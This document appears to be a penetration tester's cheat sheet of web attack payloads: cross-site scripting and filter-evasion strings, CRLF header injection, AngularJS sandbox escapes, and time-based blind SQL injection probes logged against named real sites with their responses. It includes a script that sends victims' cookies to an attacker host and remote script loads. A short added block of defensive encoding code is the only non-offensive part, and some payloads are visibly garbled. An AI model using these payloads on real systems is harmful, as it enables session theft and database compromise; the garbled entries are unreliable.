
" onEvent=@REQUESTID@ -- qualys

" onEvent=X148805780Y1Z -- qualys

>'>"><script>alert();</script>

>'>"><svg/onload=alert(document.domain)>

<script>prompt(1)</script>

<script>confirm(1)</script>

"><img src=x onerror='alert(xzz)'>

"><img src=x onerror='alert(document.domain)'>

' "/><img src= x onerror='alert(document.domain)'>

' "/><img src= x onerror=prompt(/xss/)>

"><img src=x onerror=prompt(/xss by me/)>

<img src='test' onmouseover='alert(2)'>

<img src="x" alt="'' ">

'"--></style></scRipt><scRipt>alert('XSSPOSED')</scRipt>

/><script>window.alert('XSS Vulnerable');</script>

<script>window.alert('XSS Vulnerable');</script>

#<script>alert(document.domain)</script> -- DOM

<script>alert(document.URL)</script>

<iframe src="http://www.cnn.com"></iframe>

"><img src=x onerror=alert(1)> -- stored XSS

<script>alert(1)</script>
JSON attributes

If a style sheet is allowed, this payload is used:

"--></style></script><script>alert("XSS")</script>

-------

Filter XSS

/?#&;:="%<>@[\\]^`{|}

'';!--"<XSS>=&{()}

Filtered:

<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>

%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e

<ScRipt>ALeRt("hi");</sCRipT>

vulnerable"%3B%20alert(%27Mondays%27)%3B%20"

JSON attributes

"};alert(23);a={"a":

HTML tags

CSS expression: x:expr/**/ession(alert(1))

</script><script>alert("XSS")</script>
<body onload=prompt("justqdjing")>

>'>"><svg/onload=alert(document.domain)>

"/><svg onload=prompt(document.domain)>

"></script><svg/onload=alert("XSS")>-- url

https://www.zopim.com/#1=1&__zopim_widget_proxy=1.zopim.com/s/W/xdds/PIJ4+155G8p7LL3w/c/1444997086678%22%3E%3C/script%3E%3Csvg/onload=alert%28%22XSS%22%29%3E

' onerror='alert('XSS')' a='.jpg

'|alert('XSS')|'

%27|alert%28%27XSS%27%29|%27

%2527%257Calert%2528%2527XSS%2527%2529%257C%2527

';alert(/xss/)///

';alert(/xss/)///';alert(1)//";alert(2)///";alert(3)//--></SCRIPT>">'><SCRIPT>alert(/xss/)</SCRIPT>=&{}");}alert(6);functions+xss(){//

------

javascript:alert(1);///// -outhn

javascript:alert(1);

javascript:alert(document.domain);

<ScRiPt%20>prompt(document.domain)</ScRiPt> -- name

onmouseover=prompt(document.domain)-- if html encoded by form

http://www.aol.com/?mol=acm50overlaynl031213a8345 …<%2fscript><script>prompt(/Osama Mahmood/)<%2fscript>22606c823c6&icid=acm50newslettersignup&shw=1

<SCRIPT>
Document.write('<img src=\'http://hackerhost.com/getcookie.php?cookie='+escape(document.cookie)+'\' height=1 width=1>');
</SCRIPT>

------

<style><img src='</style><img src=x onerror=alert("document.cookie")//'>

'<script>alert('xss message')</script>

"><script>alert('xss message')</script>

>/"><script>alert('xss message')</script>

"><script>alert(document.cookie)</script>

"><script>alert(document.cookie)</script>/><':

;<><script></script>/<script>alert('0')</script>

</script><script>prompt("test")</script>

"><script>alert(document.location)</script><"

--------------------------------------------------

<b><h1>Html Injection

#5 Inject fake <meta>

<a href="example.com">asdf</a>

</title><meta http-equiv='content-type' content='text/html;charset=utf-7'>

-----------------------------------------

1:- ';alert(String.fromCharCode(88,83,83))//\'; alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//\"; alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT> alert(String.fromCharCode(88,83,83))</SCRIPT>

2:- "><img src=x onerror=prompt(1)>

3:- "><script>alert("XSS");</script>

4:- x'\"></script><img src=x onerror=alert(1)>

5:- "><svg onload="prompt(/xss/)"></svg>

" onmouseover="alert(1)

6:- %22%3E%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

7:- %22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E

8:- %22%3B%3E%3Cscript%3Ealert(String.fromCharCode(73,69,82,82,69%3B%3C%2Fscript%3E

9:- %22%3E%3Cimg%20src=k%20onerror=alert%28%22XSS%22%29%20/%3E

10:- "><font size=70 color=red>xss by ashish pathak

"()%26%251

-------------------

Append <xss> in any user-input box, e.g. the recovery-mail field.


--------------------

https://www.poodlescan.com/

--------------------

callback=javascript://anything%0D%0A%0D%0Awindow.alert(1)//

javascript:alert(document.cookie);//

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";

alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--

></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC="javascript:alert('XSS');">

<a onmouseover="alert(document.cookie)">xxs link</a>

<a onmouseover=alert(document.cookie)>xxs link</a>

< is encoded as: &lt;

> is encoded as: &gt;

CODE :

%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

&lt;script&gt;alert("XSS")&lt;/script&gt;
&lt;script&gt;alert("XSS")&lt;/script&gt;

&lt;script&gt;alert(%34XSS%34)&lt;/script&gt;

&lt;script&gt;alert('XSS')&lt;/script&gt;
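Added here as a defender-side illustration, not part of these notes: the `&lt;` / `&gt;` encoding described above, plus the reason entity encoding alone is not enough when a value lands inside an event-handler attribute, which is exactly what the `&quot;` and `&colon;` payloads further down rely on. All function names are this example's own; the sample payload is copied from this sheet.

```javascript
// Added example, not from the original notes. Names are this example's own.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// HTML text / attribute context: "<" becomes "&lt;", ">" becomes "&gt;", and
// the quote characters that could close an attribute are encoded as well.
function encodeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}

// JS string-literal context: everything outside [A-Za-z0-9] becomes \xHH or
// \uHHHH, so no quote or "</" survives to terminate the literal or the script.
function encodeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Simplified model of what the HTML parser does to an attribute value before
// the JS engine sees it: numeric and named entity references are decoded.
// This is why onerror=alert(&quot;..&quot;) and href=javascript&colon;.. work.
function decodeAttributeEntities(attr) {
  const named = { amp: '&', lt: '<', gt: '>', quot: '"', colon: ':', lpar: '(', rpar: ')' };
  const has = (n) => Object.prototype.hasOwnProperty.call(named, n);
  return attr
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCharCode(Number(d)))
    .replace(/&([a-zA-Z]+);/g, (m, n) => (has(n) ? named[n] : m));
}

// Sample payload copied from this sheet ("When inside Script tag" case).
const SCRIPT_STRING_PAYLOAD = '");alert("Xss-By-Muhaddi");//';

// Emits onclick="f('VALUE')" with either HTML-only encoding or JS encoding
// followed by HTML encoding, then reports whether the JS engine would still
// see a raw quote or "</" (i.e. whether the string literal is terminated).
// HTML-only encoding fails: the parser turns &quot; back into " before JS runs.
function handlerStringIsSafe(value, useJsEncoding) {
  const inner = useJsEncoding ? encodeJsString(value) : value;
  const attr = encodeHtml(inner);                 // what the template emits
  const seenByJs = decodeAttributeEntities(attr); // what the JS engine parses
  return !/['"]|<\//.test(seenByJs);
}
```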

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#IMG_onerror_and_javascript_alert_encode

http://webtechhut.blogspot.in/2014/12/cross-site-scripting-in-two-subdomain.html

<input+type%3Dtext+onclick%3Dalert(%2FXSS%2F)>

<IMG%20SRC=axc%20onerror=alert(1)>

CRLF

http://www.yoursite.net/file?page=%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type: text/html%0d%0a%0d%0a%3Chtml%3EHacker Content%3C/html%3E

"37d8600defb103276f30e279f5fdcb6d %0D%0ASet-Cookie:%20Attacker=Attacker;

More advanced

XSS, sometimes written CSS (Cross-Site Scripting), is a cross-site scripting attack: the attacker inserts malicious HTML code into a web page.

When users browse the page, the HTML code embedded in it is executed in their browser, which achieves whatever purpose the malicious user intended.

XSS is divided into two categories:

One is an attack from the inside, which mainly means exploiting the program's own vulnerabilities to construct cross-site statements, for example the cross-site vulnerability in dvbbs's showerror.asp.

The other is an attack from the outside, which mainly means constructing your own cross-site page, or finding cross-site vulnerabilities on pages other than the target.

For example, when we want to infiltrate a site, we construct a page with a cross-site vulnerability, then construct the cross-site statement and, combined with other techniques such as social engineering, trick the target server's administrator into opening it.

(1) Common XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using JavaScript commands

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag without a semicolon and without quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tags are not case sensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (must have a semicolon)

<IMG SRC=javascript:alert("XSS")>

(6) Fixing the defective IMG tag

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) Unicode UTF-8 encoding (calculator)

<IMG SRC=jav..??..S')>

(9) Long UTF-8 Unicode encoding without semicolons (calculator)

<IMG SRC=jav..??..S')>

(10) Hexadecimal encoding without semicolons (calculator)

<IMG SRC=java..??..XSS')>

(11) Embedded tab, splitting the JavaScript

<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript

<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline

<IMG SRC = "jav ascript: alert ('XSS

');">

(14) Embedded carriage return

<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; an extreme XSS example

<IMG SRC="javascript:alert('XSS')">

(16) Overcoming character limits (with the required page)

<script> z = 'document.' </script>

<script> z = z + 'write ("' </script>

<script> z = z + '<script' </script>

<script> z = z + 'src = ht' </script>

<script> z = z + 'tp :/ / ww' </script>

<script> z = z + 'w.zoyzo' </script>

<script> z = z + '. cn / 1.' </script>

<script> z = z + 'js> </ sc' </script>

<script> z = z + 'ript> ")' </script>

<script> eval_r (z) </script>

(17) Null character

perl -e 'print "<IMG SRC=javascript:alert("XSS")>";' > out

(18) Two null characters; in practice null characters had basically no effect, because there was nowhere to use them

perl -e 'print "<SCRIPT>alert("XSS")</SCRIPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag

<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2

<BODY Onload!#$%&()*~+-_.,:;?@[/|]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3

<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double opening brackets

<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and some other browsers only)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS

<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets

<iframe src=http://3w.org/XSS.html>

(28) No single quotes, double quotes or semicolons

<SCRIPT>a=/XSS/

alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes

Code:

";alert('XSS');//

(30) End title tag

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image

<INPUT SRC="javascript:alert('XSS');">

(32) BODY image

<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag

<BODY('XSS')>

(34) IMG DYNSRC

<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC

<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND

<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image (list type)

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript

<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

design issue 360e0e url('http://www.google.com')

SQL
'%2 and if(substring(user(),1,1)='c',SLEEP(3),1)+' - true (sleeps 3 sec)

cfire_sid=42767ca19a891c1077f377f6e96120b2'%2 and if(substring(user(),2,1)='x',SLEEP(3),1)+'

----------

cfire_uid=1491167763614215' or substring(version(),1,1)=5-- ; - true (500 Internal Server Error)

cfire_uid=1491167763614215' or substring(version(),1,1)=4-- ; - false (302 Found)

cfire_uid=1491167763614215' or substring(version(),1,1)=3-- ; - false (302 Found)

cfire_uid=1491167763614215' or substring(user(),1,1)='c'-- ; - true (500 Internal Server Error)

cfire_uid=1491167763614215' or substring(user(),2,1)='f'-- ; - true (500 Internal Server Error)

cfire_uid=1491167763614215' or substring(user(),1,1)='x'-- ; - false (302 Found)

cfire_uid=1491167763614215' or substring(user(),2,1)='x'-- ; - false (302 Found)

cfire_uid=1491167763614215' or (select(1))=1-- ; - true (500 Internal Server Error)

cfire_uid=1491167763614215' or (select(1))=2-- ; - false (302 Found)

cfire_uid=1491167763614215'%20or%20substring(version(),1,1)%3d5--%20; - true (500 Internal Server Error)

cfire_uid=1491167763614215'%20or%20substring(version(),1,1)%3d4--%20; - false (302 Found)

cfire_uid=1491167763614215'%20or%20substring(version(),1,1)%3d3--%20; - false (302 Found)

cfire_uid=1491167763614215'%20or%20substring(user(),1,1)%3d'c'--%20; - true (500 Internal Server Error)

cfire_uid=1491167763614215'%20or%20substring(user(),2,1)%3d'f'--%20; - true (500 Internal Server Error)

cfire_uid=1491167763614215'%20or%20substring(user(),1,1)%3d'x'--%20; - false (302 Found)

cfire_uid=1491167763614215'%20or%20substring(user(),2,1)%3d'x'--%20; - false (302 Found)

cfire_uid=1491167763614215'%20or%20(select(1))%3d1--%20; - true (500 Internal Server Error)


cfire_uid=1491167763614215'%20or%20(select(1))%3d2--%20; - false (302 Found)

---------------------------------------

Referer: https://parapa.mail.ru/forums/showthread.php?t=106825&page=74&p=3522012

Cookie: popup_promo_8=1; PHPSESSID=5qdrcd3qddl28cj3uckcb5jgqrd3; parapa_sid=6a86c907dc5af9e51675dd9af28a26d2; parapa_uid=4836325'%20and%20(select%20*%20from%20(select(if(substring(user(),1,1)='p',sleep(5),1)))a)--%20;

parapa_sid=4836325'%20and%20(select%20*%20from%20(select(if(substring(user(),1,1)='p',sleep(20000000),1)))a)--%20 - true (sleeps 5 sec)

parapa_uid=4836325'%20and%20(select%20*%20from%20(select(if(substring(user(),2,1)='a',sleep(5),1)))a)--%20 - true (sleeps 5 sec)

parapa_uid=4836325'%20and%20(select%20*%20from%20(select(if(substring(user(),3,1)='x',sleep(5),1)))a)--%20 - false (quick response)

parapa_uid=4836325'%20and%20(select%20*%20from%20(select(if(substring(user(),4,1)='z',sleep(5),1)))a)--%20 - false (quick response)

------------------------------------------

Blind test

PoC (wait a while):

http://www.bookfresh.com/reservations?page=1&per_page=10&total_pages=1&total_entries=2&sort_by=id&order=asc&client='+or+benchmark(10000000,md5(1))='

PoC (no wait):

http://www.bookfresh.com/reservations?page=1&per_page=10&total_pages=1&total_entries=2&sort_by=id&order=asc&client='+or+benchmark(0,md5(1))='

----------------------------------------
AngularJS

<div ng-app>

{{

'a'.constructor.fromCharCode=[].join;

'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';

}}

</div>

<div ng-app>

{{
'a'.constructor.prototype.charAt=[].join;

$eval('x=alert(1)')+''

}}

</div>

<script>
onload=function(){
document.write(String.fromCharCode(97));
}
</script>

List of Sandbox bypasses

1.0.1 - 1.1.5

Mario Heiderich (Cure53)

{{constructor.constructor('alert(1)')()}}

1.2.0 - 1.2.1

Jan Horn (Cure53)

{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

1.2.2 - 1.2.5

Gareth Heyes (PortSwigger)

{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}

1.2.6 - 1.2.18

Jan Horn (Cure53)

{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}

1.2.19 - 1.2.23

Mathias Karlsson

{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}

1.2.24 - 1.2.29

Gareth Heyes (PortSwigger)

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}

1.3.0

Gábor Molnár (Google)

{{!ready && (ready = true) && (
  !call
  ? $$watchers[0].get(toString.constructor.prototype)
  : (a = apply) &&
    (apply = constructor) &&
    (valueOf = call) &&
    (''+''.toString(
      'F = Function.prototype;' +
      'F.apply = F.a;' +
      'delete F.a;' +
      'delete F.valueOf;' +
      'alert(1);'
    ))
);}}

1.3.1 - 1.3.2

Gareth Heyes (PortSwigger)

{{

{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;

'a'.constructor.prototype.charAt=''.valueOf;

$eval('x=alert(1)//');

}}

1.3.3 - 1.3.18

Gareth Heyes (PortSwigger)

{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;

'a'.constructor.prototype.charAt=[].join;

$eval('x=alert(1)//'); }}

1.3.19

Gareth Heyes (PortSwigger)

{{

'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;

$eval('x=alert(1)//');

}}

1.3.20

Gareth Heyes (PortSwigger)

{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

1.4.0 - 1.4.9

Gareth Heyes (PortSwigger)

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

TIME payload

%22%20onmouseover%3dalert%281%29%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20d7451

Basic XSS Payloads:

<script>alert("Xss-By-Muhaddi")</script>

"><script>alert("Xss-By-Muhaddi")</script>

"><script>alert(/Xss-By-Muhaddi/)</script>

When inside Script tag:

</script><script>alert("Xss-By-Muhaddi")</script>

");alert("Xss-By-Muhaddi");//

Bypassing Tag Restriction With Toggle Case:

"><iFrAmE/src=jAvAscrIpT:alert(/Xss-By-Muhaddi/)>

"><ScRiPt>alert("Xss-By-Muhaddi")</sCrIpT>

XSS Using Image & HTML tags:

Works Only On Chrome

"><details ontoggle=confirm(0)>

"><IMG SRC=x onerror=javascript:alert(&quot;Xss-By-Muhaddi&quot;)>

"><img onmouseover=alert("Xss-By-Muhaddi")>

"><test onclick=alert(/Xss-By-Muhaddi/)>Click Me</test>

"><a href=javascript:alert(/Xss-By-Muhaddi/)>Click Me</a>

"><h1 onmouseover=alert("test")>Hover Me</h1>

"><svg/onload=prompt("Xss-By-Muhaddi")>

"><body/onload=alert("Xss-By-Muhaddi")>

Style Context:

Only Works On Older Versions of Internet Explorer, IE7, IE8

If Input Is Inside <Style> Tag:

body{xss:expression(alert("Xss-By-Muhaddi"))}

If Input Is In style="" Attribute:

xss:expression(alert(/Xss-By-Muhaddi/)

Bypass Script Tag Filtering:

<<SCRIPT>alert("Xss-By-Muhaddi");//<</SCRIPT>

%253script%253ealert(/Xss-By-Muhaddi/)%253c/script%253e

"><s"%2b"cript>alert(/Xss-By-Muhaddi/)</script>

foo<script>alert(/Xss-By-Muhaddi/)</script>

<scr<script>ipt>alert(/Xss-By-Muhaddi/)</scr</script>ipt>

Advance Payloads:

Hex Encoding

"><IMG SRC=x onerror=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

"><a XSS-test href=jAvAsCrIpT&colon;prompt&lpar;/Xss-By-Muhaddi/&rpar;>ClickMe

"><h1/onclick=a\u006cer\u0074(/Xss-By-Muhaddi/)>Click Me</h1>

"><a id="a"href=javascript&colon;a\u006cer\u0074&lpar;/Xss-By-Muhaddi/&rpar; id="xss-test">Click me</a>#a <

<a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">ClickMe

Some Alternative Useful Keywords:

Alert = a\u006cer\u0074

Prompt = p\u0072om\u0070\u0074

Confirm = co\u006efir\u006d

Javascript = j&#x00041vascr&#x00069pt

: = &colon;

( = &lpar;

) = &rpar;

Using alert(/Xss/) in a link = alert%28 /Xss/%29 example: <a href="javascript:alert%28 /Xss/%29">Click Me

Base64 alert(2) = data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
